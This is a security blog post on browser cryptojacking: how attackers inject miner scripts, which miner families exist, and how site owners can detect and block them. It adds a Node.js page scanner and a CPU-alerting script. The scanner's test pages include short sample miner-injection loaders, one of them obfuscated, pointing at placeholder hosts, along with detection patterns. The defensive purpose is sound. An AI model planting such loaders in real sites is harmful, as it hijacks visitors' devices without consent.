Cryptojacking: What is it And What You Need to Know in 2023
Cyber Risks & Threats | May 11, 2023
It’s a bit like someone else borrowing your car to drive deliveries and earn money behind your back, using up your gas and leaving you with added wear and tear on your vehicle in the process.
The image above succinctly describes the process of a client-side cryptojacking attack, but to better understand this process, let’s take a closer look at the steps in the attack. For a more detailed breakdown of common cybersecurity attack techniques (and how to mitigate them), check out our recent blogs on Cyberattacks and the OSI model.
Step One: Finding an Injection Point
For starters, would-be attackers need to identify a target. To do this, they may employ automated scanning tools, such as vulnerability scanners or web application scanners, to quickly scan a large number of websites for common security issues like outdated software versions, misconfigurations, or known vulnerabilities in web applications. They may also go after a specific web application framework, a popular plugin, or a widely used third-party script in a supply chain attack, so that a single compromise delivers the miner to every site that loads it.
Step Two: Creating Malicious Code
Simply signing up with a mining pool or mining-script service and pasting a couple of lines of loader code into the source of a website is all it takes for an attacker to set up shop.
And attackers are not short of options when choosing which miner to inject into your website. In the course of our research, we found thousands of live samples, including cryptoloot, coinimp, jsecoin, crypto-webminer, cryptonoter, monerominer, deepminer, and coin-have.
Step Three: Code Injection
The attacker plants the loader in the compromised page, template, theme, or plugin so that it is served to every visitor. Because the mining itself happens in the visitor's browser, the compromised site only has to deliver the script; it does not need to host the miner or the pool.
Step Four: Execution and Mining
As soon as the page loads, the miner script starts running in the visitor's browser. It continuously works on the cryptographic puzzles that validate and confirm transactions on the cryptocurrency network; once a miner solves a puzzle, it creates a new block and earns a reward in the form of cryptocurrency. In practice a single browser rarely finds a block on its own: the script joins a mining pool, submits partial solutions ("shares") over the network, and the pool credits the attacker's account for the work every visitor contributes.
As the mining process progresses, the victim’s device experiences increased CPU or GPU usage, causing the system to work harder and generate additional heat. This can lead to device slowdowns, reduced battery life, and potential hardware damage in extreme cases.
While we were researching cryptojacking, our laptops heated up and their fans kicked on. Cryptojacking not only degrades the performance of users' computers but shortens the life of their components. For site owners, cryptojacking degrades page performance as well as user experience, ultimately driving visitors away from your site.
Step Five: Concealment and Persistence
To avoid detection, the attacker may obfuscate the loader (for example by encoding the pool URL or assembling the script at runtime), periodically change the location of the injected script, or throttle the miner so that the CPU load stays below what a visitor would notice.
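As an added example (this is not code from the original post or from any of the miner projects it names), here is a static scanner in Node.js that turns the five steps above into checks a site owner can run over a page: it pulls the script tags out of the HTML, looks for the miner names listed under Step Two, for the WebSocket and pool-login shapes a browser miner needs, and for the concealment tricks from Step Five such as atob or String.fromCharCode, decoding base64 literals one layer deep to catch a hidden pool URL. The indicator list, the regular expressions, the .example hostnames and the three sample pages are assumptions constructed for the demo, not captured payloads.

```javascript
// Added example: static scan of page HTML for an injected browser miner.
// Not from the original post; indicator names are assumed and not exhaustive.
const MINER_INDICATORS = [
  'coinhive', 'cryptoloot', 'crypto-loot', 'coinimp', 'jsecoin', 'crypto-webminer',
  'cryptonoter', 'monerominer', 'deepminer', 'coin-have',
];
// Shapes a pool-backed browser miner needs: a WebSocket to the pool (or a
// proxy), a Stratum-style login, and the site-key / throttle API of the libs.
const PROTOCOL_PATTERNS = [
  { kind: 'websocket', re: /new\s+WebSocket\s*\(/ },
  { kind: 'stratum-login', re: /["']method["']\s*:\s*["']login["']/i },
  { kind: 'miner-api', re: /\.Anonymous\s*\(|\bthrottle\s*:/ },
];
// Concealment tricks from Step Five that a legitimate page rarely needs.
const OBFUSCATION_PATTERNS = [
  { kind: 'atob', re: /\batob\s*\(/ },
  { kind: 'fromCharCode', re: /String\.fromCharCode/ },
  { kind: 'eval', re: /\beval\s*\(/ },
  { kind: 'unescape', re: /\bunescape\s*\(/ },
];
const BASE64_LITERAL = /["']([A-Za-z0-9+/]{24,}={0,2})["']/g;

// Pull every <script> out of the page as { src, body }.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Record known miner names and protocol shapes found in a blob of text.
function scanText(text, where, findings) {
  const lower = text.toLowerCase();
  for (const name of MINER_INDICATORS) {
    if (lower.includes(name)) findings.push({ kind: 'known-miner', detail: name, where });
  }
  for (const p of PROTOCOL_PATTERNS) {
    if (p.re.test(text)) findings.push({ kind: p.kind, detail: null, where });
  }
}

function scanScript(script, findings) {
  const where = script.src ? `src=${script.src}` : 'inline';
  if (script.src) scanText(script.src, where, findings);
  if (!script.body.trim()) return;
  scanText(script.body, where, findings);
  for (const p of OBFUSCATION_PATTERNS) {
    if (p.re.test(script.body)) findings.push({ kind: 'obfuscation', detail: p.kind, where });
  }
  // Decode base64 literals one layer deep: loaders often hide the pool URL this way.
  BASE64_LITERAL.lastIndex = 0;
  let m;
  while ((m = BASE64_LITERAL.exec(script.body)) !== null) {
    const decoded = Buffer.from(m[1], 'base64').toString('latin1');
    scanText(decoded, `${where} (base64-decoded)`, findings);
  }
}

// Verdict: a known miner name is conclusive; protocol or API shapes, or a
// WebSocket together with obfuscation, are suspicious; obfuscation alone
// is only worth a look.
function scanPage(html) {
  const findings = [];
  for (const s of extractScripts(html)) scanScript(s, findings);
  const kinds = new Set(findings.map(f => f.kind));
  let verdict = 'clean';
  if (kinds.has('known-miner')) verdict = 'miner';
  else if (kinds.has('stratum-login') || kinds.has('miner-api') ||
           (kinds.has('websocket') && kinds.has('obfuscation'))) verdict = 'suspicious';
  else if (kinds.has('obfuscation')) verdict = 'review';
  return { verdict, findings };
}

// Constructed sample pages (no real site or captured payload).
const CLEAN_PAGE = `<html><head><script src="/static/app.js"></script></head>
<body><script>document.title = "Hello";</script></body></html>`;

const PLAIN_INJECTION = `<html><head>
<script src="https://coinhive.example/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY', { throttle: 0.3 }); miner.start();</script>
</head><body>...</body></html>`;

// A loader that keeps the pool endpoint in a base64 literal and decodes it at runtime.
const POOL_URL_B64 = Buffer.from('wss://cryptoloot.example/proxy').toString('base64');
const OBFUSCATED_INJECTION = `<html><body><script>
var u = atob("${POOL_URL_B64}");
var ws = new WebSocket(u);
ws.onopen = function () { ws.send('{"method":"login","params":{"site_key":"abc"}}'); };
</script></body></html>`;

for (const [name, page] of Object.entries({ CLEAN_PAGE, PLAIN_INJECTION, OBFUSCATED_INJECTION })) {
  const r = scanPage(page);
  console.log(name, r.verdict, r.findings.map(f => `${f.kind}${f.detail ? ':' + f.detail : ''}@${f.where}`));
}
```

The clean page comes back clean, the plain injection is flagged by the miner name in both the script src and the inline body, and the obfuscated loader is only caught because the base64 literal is decoded and rescanned; the raw body contains no miner name at all. Run it against a saved copy of your own pages, and treat anything above "review" as a reason to diff the page against a known-good build.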
How prolific is cryptojacking?
In our research, we saw compromised websites ranging from personal blogs to top Alexa-ranked sites affected by cryptojacking. No single vulnerability is being exploited to compromise these websites, but we are seeing an uptick in mining operations online.
One notable example is FacexWorm, which used social engineering to trick users into downloading and installing a malicious browser extension. The extension gained access to the victim's Facebook account and sent malicious messages to the victim's friends, spreading the infection further.
Following the cryptocurrency crash of November 2022 and subsequent lowered cryptocurrency values, some attackers have turned to new techniques that target valuable cloud and server resources for cryptomining. Some attackers have begun exploiting free trials on some of the largest continuous integration and deployment (CI/CD) services to deploy code and create distributed mining platforms, while others are targeting misconfigured Kubernetes and Docker instances to gain access to the host systems and run cryptomining software.
Other attackers have turned to server-side resources. ProxyShellMiner, for example, exploits the ProxyShell chain of three Microsoft Exchange vulnerabilities to install a Monero miner on compromised servers.
What can you do to prevent cryptojacking?
So, what can you do about cryptojacking? The first step is to know the signs. After that there are two complementary approaches: detection and defense. Detecting cryptojacking isn't always easy, but defense is trickier still.
The first thing to consider is whether your website is already being cryptojacked. Here are some things to check:
- Does loading your site open outbound WebSocket or HTTP connections to hosts you don't recognize? A browser miner has to reach a mining pool or a proxy, and its traffic is a stream of job assignments and share submissions (for Monero or another CPU-mineable coin), not ordinary page requests.
- Does your computer heat up and spin up its fan when you open your website?
If you’re concerned about cryptojacking on your business network, you could also use a network monitoring tool to look for unusual resource usage.
No matter how it's done, mining cryptocurrency is a massive resource hog, which gives telltale signs such as abnormally high CPU or GPU usage, especially in off-business hours when machines should be less active. A simple way to look for abnormal use is to set up alerts for when CPU usage stays above a threshold in off-hours, or on machines that don't typically perform CPU-intensive tasks. A miner keeps the load pinned for as long as the page or process is alive, so sustained load is a better signal than a brief spike.
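The threshold alert described above, as an added example that is not from the original post: a small Node.js script that parses host CPU samples, groups them by host, and raises an alert only for a run of consecutive samples above the threshold that falls in an off-hours window or lands on a host tagged as having no CPU-heavy role. The log line format, the 20:00 to 06:00 UTC window, the 80 percent threshold, the three-sample minimum, the host names and the sample lines are all assumptions constructed for the demo.

```javascript
// Added example: off-hours / quiet-host CPU alerting over host metrics.
// Not from the original post; the line format, thresholds and samples are assumed.

// One sample per line: "<ISO-8601 UTC timestamp> host=<name> cpu=<percent>".
function parseMetrics(text) {
  const samples = [];
  for (const raw of text.split('\n')) {
    const m = /^(\S+)\s+host=(\S+)\s+cpu=(\d+(?:\.\d+)?)$/.exec(raw.trim());
    if (!m) continue; // skip blank or malformed lines rather than failing the run
    samples.push({ ts: new Date(m[1]), host: m[2], cpu: Number(m[3]) });
  }
  return samples;
}

// The off-hours window may wrap midnight (e.g. 20:00 to 06:00 UTC).
function isOffHours(ts, cfg) {
  const h = ts.getUTCHours();
  return cfg.offHoursStart > cfg.offHoursEnd
    ? h >= cfg.offHoursStart || h < cfg.offHoursEnd
    : h >= cfg.offHoursStart && h < cfg.offHoursEnd;
}

// Miners keep the CPU pinned, so alert only on runs of consecutive samples
// above the threshold, and only where that load is unexpected: during
// off-hours on any host, or at any time on hosts with no CPU-heavy role.
function findMiningCandidates(samples, overrides = {}) {
  const cfg = { threshold: 80, minConsecutive: 3, offHoursStart: 20, offHoursEnd: 6,
                quietHosts: [], ...overrides };
  const byHost = new Map();
  for (const s of samples) {
    if (!byHost.has(s.host)) byHost.set(s.host, []);
    byHost.get(s.host).push(s);
  }
  const alerts = [];
  for (const [host, list] of byHost) {
    list.sort((a, b) => a.ts - b.ts);
    let run = [];
    const closeRun = () => {
      if (run.length >= cfg.minConsecutive) {
        const quiet = cfg.quietHosts.includes(host);
        const offHours = run.every(s => isOffHours(s.ts, cfg));
        if (quiet || offHours) {
          alerts.push({
            host,
            start: run[0].ts.toISOString(),
            end: run[run.length - 1].ts.toISOString(),
            samples: run.length,
            avgCpu: Math.round(run.reduce((sum, s) => sum + s.cpu, 0) / run.length),
            reason: quiet ? 'sustained high CPU on a host with no CPU-heavy role'
                          : 'sustained high CPU in off-hours',
          });
        }
      }
      run = [];
    };
    for (const s of list) {
      if (s.cpu >= cfg.threshold) run.push(s); else closeRun();
    }
    closeRun();
  }
  return alerts;
}

// Constructed metrics: a web server pinned at 02:00 UTC, a build box busy at
// 10:00 (expected), a file server pinned at 11:00 (not expected for its role),
// and a database host with a single short spike.
const SAMPLE_METRICS = `
2023-05-10T02:00:00Z host=web-01 cpu=96
2023-05-10T02:05:00Z host=web-01 cpu=98
2023-05-10T02:10:00Z host=web-01 cpu=97
2023-05-10T02:15:00Z host=web-01 cpu=99
2023-05-10T10:00:00Z host=build-01 cpu=95
2023-05-10T10:05:00Z host=build-01 cpu=92
2023-05-10T10:10:00Z host=build-01 cpu=94
2023-05-10T11:00:00Z host=fileserver-01 cpu=91
2023-05-10T11:05:00Z host=fileserver-01 cpu=93
2023-05-10T11:10:00Z host=fileserver-01 cpu=90
2023-05-10T03:00:00Z host=db-01 cpu=99
2023-05-10T03:05:00Z host=db-01 cpu=12
2023-05-10T03:10:00Z host=db-01 cpu=14
`;

const SAMPLE_ALERTS = findMiningCandidates(parseMetrics(SAMPLE_METRICS), { quietHosts: ['fileserver-01'] });
for (const a of SAMPLE_ALERTS) {
  console.log(`${a.host}: ${a.reason} (${a.samples} samples, avg ${a.avgCpu}%) ${a.start}..${a.end}`);
}
```

With these samples only web-01 (pinned overnight) and fileserver-01 (pinned during the day, but tagged as a quiet host) are reported; the build server's daytime load and the database's single spike are not. The quietHosts list is what makes the daytime case work, so keep it in step with your inventory of which machines are supposed to be busy.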
For a site owner, things are a bit more difficult. In order to definitively prevent cryptojacking on your website, you need full visibility into the code running on your website, as well as any third-party connectors and plugins, and the ability to unilaterally block unwanted code. A Content Security Policy helps on both counts: a script-src directive limited to the hosts you expect (with nonces or hashes for inline scripts) stops an injected loader from a foreign domain from running, a connect-src directive with the same limits blocks the WebSocket connection a miner needs to reach its pool, and CSP violation reports tell you when something tried. Subresource Integrity hashes on the third-party scripts you do load catch the supply chain case, where a script you legitimately include is altered at its source.